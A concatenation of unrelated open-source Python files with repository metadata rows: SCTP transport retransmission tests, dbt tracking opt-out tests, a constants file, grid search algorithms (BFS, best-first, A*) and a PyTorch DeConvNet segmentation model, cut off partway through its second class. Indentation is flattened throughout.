run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH * 8))
self.assertEqual(client._cwnd, 3600)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 3600)
self.assertEqual(sent_tsns, [0, 1, 2])
self.assertEqual(outstanding_tsns(client), [0, 1, 2])
self.assertEqual(queued_tsns(client), [3, 4, 5, 6, 7])
# SACK comes in acknowledging chunks 0 and 2
sack = SackChunk()
sack.cumulative_tsn = 0
sack.gaps = [(2, 2)] # TSN 1 is missing
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5])
self.assertEqual(outstanding_tsns(client), [1, 2, 3, 4, 5])
self.assertEqual(queued_tsns(client), [6, 7])
# SACK comes in acknowledging chunks 3 and 4
sack = SackChunk()
sack.cumulative_tsn = 0
sack.gaps = [(2, 4)] # TSN 1 is missing
with self.assertTimerPreserved(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [1, 2, 3, 4, 5, 6, 7])
self.assertEqual(queued_tsns(client), [])
# SACK comes in acknowledging 2 more chunks
sack = SackChunk()
sack.cumulative_tsn = 0
sack.gaps = [(2, 6)] # TSN 1 is missing
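# this is the third SACK reporting TSN 1 as missing, which triggers a fast retransmit
# (note the extra 1 appended to sent_tsns) and enters fast recovery until TSN 7 is acked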
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, 7)
self.assertEqual(client._flight_size, 2400)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7, 1])
self.assertEqual(outstanding_tsns(client), [1, 2, 3, 4, 5, 6, 7])
self.assertEqual(queued_tsns(client), [])
# SACK comes in acknowledging final chunks
sack = SackChunk()
sack.cumulative_tsn = 7
with self.assertTimerStopped(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 0)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7, 1])
self.assertEqual(outstanding_tsns(client), [])
self.assertEqual(queued_tsns(client), [])
def test_send_data_with_gap_2_retransmit(self):
sent_tsns = []
async def mock_send_chunk(chunk):
sent_tsns.append(chunk.tsn)
client = RTCSctpTransport(self.client_transport)
client._last_sacked_tsn = 4294967295
client._local_tsn = 0
client._ssthresh = 131072
client._send_chunk = mock_send_chunk
# queue 8 chunks, but cwnd only allows 3
with self.assertTimerRestarted(client):
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH * 8))
self.assertEqual(client._cwnd, 3600)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 3600)
self.assertEqual(sent_tsns, [0, 1, 2])
self.assertEqual(outstanding_tsns(client), [0, 1, 2])
self.assertEqual(queued_tsns(client), [3, 4, 5, 6, 7])
# SACK comes in acknowledging chunk 2
sack = SackChunk()
sack.cumulative_tsn = 4294967295
sack.gaps = [(3, 3)] # TSN 0 and 1 are missing
with self.assertTimerPreserved(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 3600)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 3600)
self.assertEqual(sent_tsns, [0, 1, 2, 3])
self.assertEqual(outstanding_tsns(client), [0, 1, 2, 3])
self.assertEqual(queued_tsns(client), [4, 5, 6, 7])
# SACK comes in acknowledging chunk 3
sack = SackChunk()
sack.cumulative_tsn = 4294967295
sack.gaps = [(3, 4)] # TSN 0 and 1 are missing
with self.assertTimerPreserved(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 3600)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 3600)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4])
self.assertEqual(outstanding_tsns(client), [0, 1, 2, 3, 4])
self.assertEqual(queued_tsns(client), [5, 6, 7])
# SACK comes in acknowledging chunk 4
sack = SackChunk()
sack.cumulative_tsn = 4294967295
sack.gaps = [(3, 5)] # TSN 0 and 1 are missing
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, 4)
self.assertEqual(client._flight_size, 2400)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 0, 1])
self.assertEqual(outstanding_tsns(client), [0, 1, 2, 3, 4])
self.assertEqual(queued_tsns(client), [5, 6, 7])
# SACK comes in acknowledging all chunks up to 4
sack = SackChunk()
sack.cumulative_tsn = 4
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 3600)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 0, 1, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [5, 6, 7])
self.assertEqual(queued_tsns(client), [])
# SACK comes in acknowledging final chunks
sack = SackChunk()
sack.cumulative_tsn = 7
with self.assertTimerStopped(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 0)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 0, 1, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [])
self.assertEqual(queued_tsns(client), [])
def test_send_data_with_gap_3_retransmit(self):
sent_tsns = []
async def mock_send_chunk(chunk):
sent_tsns.append(chunk.tsn)
client = RTCSctpTransport(self.client_transport)
client._last_sacked_tsn = 4294967295
client._local_tsn = 0
client._ssthresh = 131072
client._send_chunk = mock_send_chunk
# queue 8 chunks, but cwnd only allows 3
with self.assertTimerRestarted(client):
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH * 8))
self.assertEqual(client._cwnd, 3600)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 3600)
self.assertEqual(sent_tsns, [0, 1, 2])
self.assertEqual(outstanding_tsns(client), [0, 1, 2])
self.assertEqual(queued_tsns(client), [3, 4, 5, 6, 7])
# SACK comes in acknowledging chunks 0 and 1
sack = SackChunk()
sack.cumulative_tsn = 1
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5])
self.assertEqual(outstanding_tsns(client), [2, 3, 4, 5])
self.assertEqual(queued_tsns(client), [6, 7])
# SACK comes in acknowledging chunk 5
sack = SackChunk()
sack.cumulative_tsn = 1
sack.gaps = [(4, 4)] # TSN 2, 3 and 4 are missing
with self.assertTimerPreserved(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6])
self.assertEqual(outstanding_tsns(client), [2, 3, 4, 5, 6])
self.assertEqual(queued_tsns(client), [7])
# SACK comes in acknowledging chunk 6
sack = SackChunk()
sack.cumulative_tsn = 1
sack.gaps = [(4, 5)] # TSN 2, 3 and 4 are missing
with self.assertTimerPreserved(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [2, 3, 4, 5, 6, 7])
self.assertEqual(queued_tsns(client), [])
# artificially raise flight size to hit cwnd
client._flight_size += 2400
# SACK comes in acknowledging chunk 7
sack = SackChunk()
sack.cumulative_tsn = 1
sack.gaps = [(4, 6)] # TSN 2, 3 and 4 are missing
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, 7)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7, 2, 3])
self.assertEqual(outstanding_tsns(client), [2, 3, 4, 5, 6, 7])
self.assertEqual(queued_tsns(client), [])
# SACK comes in acknowledging all chunks up to 3, and 5, 6, 7
sack = SackChunk()
sack.cumulative_tsn = 3
sack.gaps = [(2, 4)] # TSN 4 is missing
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, 7)
self.assertEqual(client._flight_size, 3600)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7, 2, 3, 4])
self.assertEqual(outstanding_tsns(client), [4, 5, 6, 7])
self.assertEqual(queued_tsns(client), [])
# SACK comes in acknowledging all chunks
sack = SackChunk()
sack.cumulative_tsn = 7
with self.assertTimerStopped(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 2400)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7, 2, 3, 4])
self.assertEqual(outstanding_tsns(client), [])
self.assertEqual(queued_tsns(client), [])
def test_t2_expired_when_shutdown_ack_sent(self):
async def mock_send_chunk(chunk):
pass
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 0
client._send_chunk = mock_send_chunk
chunk = ShutdownAckChunk()
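# the T2 timer guards SHUTDOWN ACK retransmission; each expiry counts as a failure and once
# the count exceeds the maximum (10 here) the association is closed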
# fails once
client._set_state(RTCSctpTransport.State.SHUTDOWN_ACK_SENT)
client._t2_start(chunk)
client._t2_expired()
self.assertEqual(client._t2_failures, 1)
self.assertIsNotNone(client._t2_handle)
self.assertEqual(client._association_state, RTCSctpTransport.State.SHUTDOWN_ACK_SENT)
# fails 10 times
client._t2_failures = 9
client._t2_expired()
self.assertEqual(client._t2_failures, 10)
self.assertIsNotNone(client._t2_handle)
self.assertEqual(client._association_state, RTCSctpTransport.State.SHUTDOWN_ACK_SENT)
# fails 11 times
client._t2_expired()
self.assertEqual(client._t2_failures, 11)
self.assertIsNone(client._t2_handle)
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
# let async code complete
run(asyncio.sleep(0))
def test_t3_expired(self):
async def mock_send_chunk(chunk):
pass
async def mock_transmit():
pass
client = RTCSctpTransport(self.client_transport)
client._local_tsn = 0
client._send_chunk = mock_send_chunk
# 1 chunk
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH))
self.assertIsNotNone(client._t3_handle)
self.assertEqual(outstanding_tsns(client), [0])
self.assertEqual(queued_tsns(client), [])
# t3 expires
client._transmit = mock_transmit
client._t3_expired()
self.assertIsNone(client._t3_handle)
self.assertEqual(outstanding_tsns(client), [0])
self.assertEqual(queued_tsns(client), [])
for chunk in client._outbound_queue:
self.assertEqual(chunk._retransmit, True)
# let async code complete
run(asyncio.sleep(0))
| 43a805b8745987eb4e8b313a599df979d39df016 | 3,086 | py | Python
| test/unit/test_tracking.py | jankytara2/dbt | 3f4069ab6d4d5b3fc34f8fe785761b5617357b0f | ["Apache-2.0"] | 1 | 2020-11-18T21:25:53.000Z | 2020-11-18T21:25:53.000Z
| test/unit/test_tracking.py | azhard/dbt | 9cd7cbc9e35e5a7c8c4f17a3d113263f4421ab55 | ["Apache-2.0"] | 50 | 2021-11-02T06:20:50.000Z | 2022-03-31T06:23:16.000Z
| test/unit/test_tracking.py | azhard/dbt | 9cd7cbc9e35e5a7c8c4f17a3d113263f4421ab55 | ["Apache-2.0"] | 1 | 2021-11-23T20:28:07.000Z | 2021-11-23T20:28:07.000Z
|
import dbt.tracking
import datetime
import shutil
import tempfile
import unittest
class TestTracking(unittest.TestCase):
def setUp(self):
dbt.tracking.active_user = None
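# initialize_tracking() writes its anonymous user cookie under the directory passed to it,
# so each test uses (and removes) a fresh temporary directory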
self.tempdir = tempfile.mkdtemp()
def tearDown(self):
dbt.tracking.active_user = None
shutil.rmtree(self.tempdir)
def test_tracking_initial(self):
assert dbt.tracking.active_user is None
dbt.tracking.initialize_tracking(self.tempdir)
assert isinstance(dbt.tracking.active_user, dbt.tracking.User)
invocation_id = dbt.tracking.active_user.invocation_id
run_started_at = dbt.tracking.active_user.run_started_at
assert dbt.tracking.active_user.do_not_track is False
assert isinstance(dbt.tracking.active_user.id, str)
assert isinstance(invocation_id, str)
assert isinstance(run_started_at, datetime.datetime)
dbt.tracking.disable_tracking()
assert isinstance(dbt.tracking.active_user, dbt.tracking.User)
assert dbt.tracking.active_user.do_not_track is True
assert dbt.tracking.active_user.id is None
assert dbt.tracking.active_user.invocation_id == invocation_id
assert dbt.tracking.active_user.run_started_at == run_started_at
# this should generate a whole new user object -> new invocation_id/run_started_at
dbt.tracking.do_not_track()
assert isinstance(dbt.tracking.active_user, dbt.tracking.User)
assert dbt.tracking.active_user.do_not_track is True
assert dbt.tracking.active_user.id is None
assert isinstance(dbt.tracking.active_user.invocation_id, str)
assert isinstance(dbt.tracking.active_user.run_started_at, datetime.datetime)
assert dbt.tracking.active_user.invocation_id != invocation_id
# if you use `!=`, you might hit a race condition (especially on windows)
assert dbt.tracking.active_user.run_started_at is not run_started_at
def test_tracking_never_ok(self):
assert dbt.tracking.active_user is None
# this should generate a whole new user object -> new invocation_id/run_started_at
dbt.tracking.do_not_track()
assert isinstance(dbt.tracking.active_user, dbt.tracking.User)
assert dbt.tracking.active_user.do_not_track is True
assert dbt.tracking.active_user.id is None
assert isinstance(dbt.tracking.active_user.invocation_id, str)
assert isinstance(dbt.tracking.active_user.run_started_at, datetime.datetime)
def test_disable_never_enabled(self):
assert dbt.tracking.active_user is None
# this should generate a whole new user object -> new invocation_id/run_started_at
dbt.tracking.disable_tracking()
assert isinstance(dbt.tracking.active_user, dbt.tracking.User)
assert dbt.tracking.active_user.do_not_track is True
assert dbt.tracking.active_user.id is None
assert isinstance(dbt.tracking.active_user.invocation_id, str)
assert isinstance(dbt.tracking.active_user.run_started_at, datetime.datetime)
| 606c8f4142c49735fda388a01a5ac0cd4f3bafe4 | 286 | py | Python
| resemblance/main/similarity/conf/constants.py | Sorarinu/ProjectP2016_F | 388afadea7e6efa2a43404c66d545482d75b2944 | ["MIT"] | null | null | null
| resemblance/main/similarity/conf/constants.py | Sorarinu/ProjectP2016_F | 388afadea7e6efa2a43404c66d545482d75b2944 | ["MIT"] | null | null | null
| resemblance/main/similarity/conf/constants.py | Sorarinu/ProjectP2016_F | 388afadea7e6efa2a43404c66d545482d75b2944 | ["MIT"] | null | null | null
|
BODY_TEXT_FILE = '/var/www/html/ProjectP2016_F/resemblance/main/similarity/conf/file/html_body.txt'
WAKATI_FILE = '/var/www/html/ProjectP2016_F/resemblance/main/similarity/conf/file/wakati.txt'
MODEL = '/var/www/html/ProjectP2016_F/resemblance/main/similarity/conf/models/sample.model'
| 60887d3f57b30db5e3807d01ea719a35d30eb2ac | 162 | py | Python
| src/deterministic/__init__.py | kjhall01/learning_machines | fe40a2852658aeca304262a211d46b8d4e304e85 | ["MIT"] | 1 | 2021-09-17T17:04:58.000Z | 2021-09-17T17:04:58.000Z
| src/deterministic/__init__.py | kjhall01/extremelearning | fe40a2852658aeca304262a211d46b8d4e304e85 | ["MIT"] | null | null | null
| src/deterministic/__init__.py | kjhall01/extremelearning | fe40a2852658aeca304262a211d46b8d4e304e85 | ["MIT"] | null | null | null
|
from .elm import *
from .pca_initialization import *
from .pca_pruning import *
from .pca_transformed import *
from .drop_elm import *
from .pruned_elm import *
| 60a06373f4c183d46d04179d82aa06a995cbb166 | 3,902 | py | Python
| SearchAlgorithms.py | SimonK91/search-algorithms | acce8752953db0c817027828d4c228e0f4d96ded | ["MIT"] | null | null | null
| SearchAlgorithms.py | SimonK91/search-algorithms | acce8752953db0c817027828d4c228e0f4d96ded | ["MIT"] | null | null | null
| SearchAlgorithms.py | SimonK91/search-algorithms | acce8752953db0c817027828d4c228e0f4d96ded | ["MIT"] | null | null | null
|
from typing import Tuple, Optional, List, Dict, Set
from Grid import Grid
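# Manhattan distance between two grid cells; used as the heuristic h(n) by
# best_first_search and a_star_search below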
def _h_cost(a, b):
dx = abs(a[0] - b[0])
dy = abs(a[1] - b[1])
return dx + dy
def breadth_first_search(grid: Grid):
start = grid.get_start()
goal = grid.get_goal()
open_set: List[Tuple[int, int]] = []
route: Dict[Tuple[int, int], Tuple[int, int]] = {start: None}
closed_set: Set[Tuple[int, int]] = set()
path: List[Tuple[int, int]] = []
open_set.append(start)
while open_set:
yield open_set, closed_set, path
cell = open_set[0]
open_set.remove(cell)
closed_set.add(cell)
if cell == goal:
while cell:
path.append(cell)
cell = route[cell]
path = list(reversed(path))
break
else:
for nbr in grid.get_neighbours(*cell):
if nbr not in closed_set and nbr not in open_set:
route[nbr] = cell
open_set.append(nbr)
for i in range(len(path)):
yield open_set, closed_set, path[:i]
for i in range(100):
yield open_set, closed_set, path
def best_first_search(grid: Grid):
start = grid.get_start()
goal = grid.get_goal()
open_set: Set[Tuple[int, int]] = set()
route: Dict[Tuple[int, int], Tuple[int, int]] = {start: None}
closed_set: Set[Tuple[int, int]] = set()
path: List[Tuple[int, int]] = []
open_set.add(start)
while open_set:
yield open_set, closed_set, path
cell = None
cost = None
for obj in open_set:
cand_cost = _h_cost(obj, goal)
if cost is None or cand_cost < cost:
cell = obj
cost = cand_cost
open_set.remove(cell)
closed_set.add(cell)
if cell == goal:
while cell:
path.append(cell)
cell = route[cell]
path = list(reversed(path))
break
else:
for nbr in grid.get_neighbours(*cell):
if nbr not in closed_set and nbr not in open_set:
open_set.add(nbr)
route[nbr] = cell
for i in range(len(path)):
yield open_set, closed_set, path[:i]
for i in range(100):
yield open_set, closed_set, path
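# A* differs from best-first search only in its ordering: it expands the open-set cell with
# the lowest f(n) = g(n) + h(n), where costs[] tracks g (steps from the start) and _h_cost
# supplies the heuristic h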
def a_star_search(grid: Grid):
start = grid.get_start()
goal = grid.get_goal()
open_set: Set[Tuple[int, int]] = set()
route: Dict[Tuple[int, int], Tuple[int, int]] = {start: None}
costs: Dict[Tuple[int, int], int] = {start: 0}
closed_set: Set[Tuple[int, int]] = set()
path: List[Tuple[int, int]] = []
open_set.add(start)
while open_set:
yield open_set, closed_set, path
cell: Optional[Tuple[int, int]] = None
cost: Optional[int] = None
for obj in open_set:
cand_cost = _h_cost(obj, goal) + costs[obj]
if cost is None or cand_cost < cost: # or (cand_cost == cost and costs[obj] > costs[cell]):
cell = obj
cost = cand_cost
open_set.remove(cell)
closed_set.add(cell)
if cell == goal:
while cell:
path.append(cell)
cell = route[cell]
path = list(reversed(path))
break
else:
for nbr in grid.get_neighbours(*cell):
if nbr not in closed_set:
if nbr not in open_set:
open_set.add(nbr)
route[nbr] = cell
costs[nbr] = costs[cell]+1
elif costs[cell] + 1 < costs[nbr]:
route[nbr] = cell
costs[nbr] = costs[cell] + 1
for i in range(len(path)):
yield open_set, closed_set, path[:i]
for i in range(100):
yield open_set, closed_set, path
| 60c2e87f77eece56394000713bd093ac6e608431 | 21,847 | py | Python
| core/models/DeConvNet.py | rarefin/Seismic-Image-Segmentation | aeb31d65b8f2bd4691f1da7a27e1e34310a389fb | ["MIT"] | 2 | 2020-09-17T10:11:48.000Z | 2020-09-22T07:08:17.000Z
| core/models/Redundant/DeConvNet.py | quamernasim/PETAI-master | d76f37bea1e313246a556871c6304370e9a5616b | ["MIT"] | null | null | null
| core/models/Redundant/DeConvNet.py | quamernasim/PETAI-master | d76f37bea1e313246a556871c6304370e9a5616b | ["MIT"] | 1 | 2021-11-15T16:58:39.000Z | 2021-11-15T16:58:39.000Z
|
"""
This is the patch-based deconvolution network (with or without skip connections) for semantic segmentation of
seismic images. We compare our model (SeismicNet) with these two models, which are provided as
baselines in the paper https://arxiv.org/abs/1901.07659. The code is taken from:
https://github.com/olivesgatech/facies_classification_benchmark/blob/master/core/models/patch_deconvnet.py
"""
import torch.nn as nn
class DeConvNet(nn.Module):
def __init__(self, n_classes=4, learned_billinear=False):
super(DeConvNet, self).__init__()
self.learned_billinear = learned_billinear
self.n_classes = n_classes
self.unpool = nn.MaxUnpool2d(2, stride=2)
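# the encoder blocks below return max-pool indices (return_indices=True) so the decoder's
# MaxUnpool2d stages can place activations back at their original spatial positions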
self.conv_block1 = nn.Sequential(
# conv1_1
nn.Conv2d(1, 64, 3, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv1_2
nn.Conv2d(64, 64, 3, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool1
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_1
# 48*48
self.conv_block2 = nn.Sequential(
# conv2_1
nn.Conv2d(64, 128, 3, padding=1),
nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv2_2
nn.Conv2d(128, 128, 3, padding=1),
nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool2
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_2
# 24*24
self.conv_block3 = nn.Sequential(
# conv3_1
nn.Conv2d(128, 256, 3, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv3_2
nn.Conv2d(256, 256, 3, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv3_3
nn.Conv2d(256, 256, 3, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool3
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_3
# 12*12
self.conv_block4 = nn.Sequential(
# conv4_1
nn.Conv2d(256, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv4_2
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv4_3
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool4
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_4
# 6*6
self.conv_block5 = nn.Sequential(
# conv5_1
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv5_2
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv5_3
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool5
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_5
# 3*3
self.conv_block6 = nn.Sequential(
# fc6
nn.Conv2d(512, 4096, 3),
# set the filter size and no padding to make output into 1*1
nn.BatchNorm2d(4096, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
# 1*1
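# sanity check on the annotation above: with a 3*3 input, kernel 3, stride 1 and no padding, the output side is (3 - 3)/1 + 1 = 1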
self.conv_block7 = nn.Sequential(
# fc7
nn.Conv2d(4096, 4096, 1),
# set the filter size to make output into 1*1
nn.BatchNorm2d(4096, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.deconv_block8 = nn.Sequential(
# fc6-deconv
nn.ConvTranspose2d(4096, 512, 3, stride=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
# 3*3
self.unpool_block9 = nn.Sequential(
# unpool5
nn.MaxUnpool2d(2, stride=2), )
# usage unpool(output, indices)
# 6*6
self.deconv_block10 = nn.Sequential(
# deconv5_1
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv5_2
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv5_3
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.unpool_block11 = nn.Sequential(
# unpool4
nn.MaxUnpool2d(2, stride=2), )
# 12*12
self.deconv_block12 = nn.Sequential(
# deconv4_1
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv4_2
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv4_3
nn.ConvTranspose2d(512, 256, 3, stride=1, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.unpool_block13 = nn.Sequential(
# unpool3
nn.MaxUnpool2d(2, stride=2), )
# 24*24
self.deconv_block14 = nn.Sequential(
# deconv3_1
nn.ConvTranspose2d(256, 256, 3, stride=1, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv3_2
nn.ConvTranspose2d(256, 256, 3, stride=1, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv3_3
nn.ConvTranspose2d(256, 128, 3, stride=1, padding=1),
nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.unpool_block15 = nn.Sequential(
# unpool2
nn.MaxUnpool2d(2, stride=2), )
# 48*48
self.deconv_block16 = nn.Sequential(
# deconv2_1
nn.ConvTranspose2d(128, 128, 3, stride=1, padding=1),
nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv2_2
nn.ConvTranspose2d(128, 64, 3, stride=1, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.unpool_block17 = nn.Sequential(
# unpool1
nn.MaxUnpool2d(2, stride=2), )
# 96*96
self.deconv_block18 = nn.Sequential(
# deconv1_1
nn.ConvTranspose2d(64, 64, 3, stride=1, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv1_2
nn.ConvTranspose2d(64, 64, 3, stride=1, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.seg_score19 = nn.Sequential(
# seg-score
nn.Conv2d(64, self.n_classes, 1), )
if self.learned_billinear:
raise NotImplementedError
def forward(self, x):
size0 = x.size()
conv1, indices1 = self.conv_block1(x)
size1 = conv1.size()
conv2, indices2 = self.conv_block2(conv1)
size2 = conv2.size()
conv3, indices3 = self.conv_block3(conv2)
size3 = conv3.size()
conv4, indices4 = self.conv_block4(conv3)
size4 = conv4.size()
conv5, indices5 = self.conv_block5(conv4)
conv6 = self.conv_block6(conv5)
conv7 = self.conv_block7(conv6)
conv8 = self.deconv_block8(conv7)
conv9 = self.unpool(conv8, indices5, output_size=size4)
conv10 = self.deconv_block10(conv9)
conv11 = self.unpool(conv10, indices4, output_size=size3)
conv12 = self.deconv_block12(conv11)
conv13 = self.unpool(conv12, indices3, output_size=size2)
conv14 = self.deconv_block14(conv13)
conv15 = self.unpool(conv14, indices2, output_size=size1)
conv16 = self.deconv_block16(conv15)
conv17 = self.unpool(conv16, indices1, output_size=size0)
conv18 = self.deconv_block18(conv17)
out = self.seg_score19(conv18)
return out
def init_vgg16_params(self, vgg16, copy_fc8=True):
blocks = [self.conv_block1,
self.conv_block2,
self.conv_block3,
self.conv_block4,
self.conv_block5]
ranges = [[0, 4], [5, 9], [10, 16], [17, 23], [24, 29]]
features = list(vgg16.features.children())
i_layer = 0
# copy convolutional filters from vgg16
for idx, conv_block in enumerate(blocks):
for l1, l2 in zip(features[ranges[idx][0]:ranges[idx][1]], conv_block):
if isinstance(l1, nn.Conv2d) and isinstance(l2, nn.Conv2d):
if i_layer == 0:
# average VGG16's three RGB input channels into the single seismic input channel
l2.weight.data = ((l1.weight.data[:, 0, :, :] + l1.weight.data[:, 1, :, :] + l1.weight.data[:, 2, :, :]) / 3.0).view(l2.weight.size())
l2.bias.data = l1.bias.data
i_layer = i_layer + 1
else:
assert l1.weight.size() == l2.weight.size()
assert l1.bias.size() == l2.bias.size()
l2.weight.data = l1.weight.data
l2.bias.data = l1.bias.data
i_layer = i_layer + 1
class DeConvNetSkip(nn.Module):
def __init__(self, n_classes=4, learned_billinear=False):
super(DeConvNetSkip, self).__init__()
self.learned_billinear = learned_billinear
self.n_classes = n_classes
self.unpool = nn.MaxUnpool2d(2, stride=2)
self.conv_block1 = nn.Sequential(
# conv1_1
